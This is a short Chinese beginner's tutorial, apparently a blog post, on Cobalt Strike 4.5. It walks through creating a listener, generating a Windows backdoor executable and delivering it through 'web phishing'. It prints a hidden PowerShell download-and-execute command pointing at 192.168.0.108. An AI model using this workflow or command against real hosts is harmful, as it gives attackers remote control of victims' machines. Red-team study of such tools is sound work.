小白学习Cobalt Strike4.5(二)

简介: 小白学习Cobalt Strike4.5(二)

一、添加监听器

1、点击菜单栏下面那个耳机的图标,出现监听器选项卡,然后点击添加


2、修改关键参数,填写服务端的ip地址192.168.0.108,HTTP上线端口可以是任意端口,这里改为8888,然后点击保存

3、自动将监听器添加到下面的选项卡里

二、生成后门

1、点击攻击,选择生成后门,再选择Windows可执行程序(E)

2、点击选择按钮,添加上一步生成的名为ayou的监听器,点击选择,然后回到对话框,再点击生成。

三、获取目标主机

将生成的exe文件,在目标主机上运行,获取目标主机信息

四、web钓鱼

1、点击攻击,选择web钓鱼(W),选择web投递(Stageless)

2、选择上一步生成的名为aiyou的监听器,然后点击运行


3、会程程一条命令,让目标主机通过powershell执行该命令

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.108:80/a'))"


4、主机成功上线

仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。

相关文章
|
安全 Linux Shell
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
2558 0
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
|
安全 Linux 数据安全/隐私保护
小白学习Cobalt Strike4.5(一)
小白学习Cobalt Strike4.5(一)
405 0
|
8月前
|
安全 测试技术 网络安全
Cobalt Strike 4.10 for Windows - 对手模拟和红队行动
Cobalt Strike 4.10 for Windows - 对手模拟和红队行动
445 11
Cobalt Strike 4.10 for Windows - 对手模拟和红队行动
|
Oracle Java 关系型数据库
CentOS 7.6操作系统部署JDK实战案例
这篇文章介绍了在CentOS 7.6操作系统上通过多种方式部署JDK的详细步骤,包括使用yum安装openjdk、基于rpm包和二进制包安装Oracle JDK,并提供了配置环境变量的方法。
462 80
|
安全 应用服务中间件 Apache
Apache-Tomcat-Ajp文件读取漏洞(CVE-2020-1938、CNVD-2020-10487)
Apache-Tomcat-Ajp文件读取漏洞产生原因是由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件
1339 1
|
12月前
|
安全 Shell 网络安全
文件上传漏洞(四)edjpgcom
文件上传漏洞(四)edjpgcom
|
12月前
|
存储 网络协议 安全
Kali渗透测试:拒绝服务攻击(二)
Kali渗透测试:拒绝服务攻击(二)
748 0
|
12月前
|
安全 网络安全 数据库
Kali渗透测试:使用工具Metasploit攻击操作系统(一)
Kali渗透测试:使用工具Metasploit攻击操作系统(一)
737 0
|
Ubuntu Java Shell
Cobalt Strike配置
Cobalt Strike配置
336 0
|
数据安全/隐私保护
Cobaltstrike系列(一)-- 远程控制
Cobaltstrike系列(一)-- 远程控制
247 0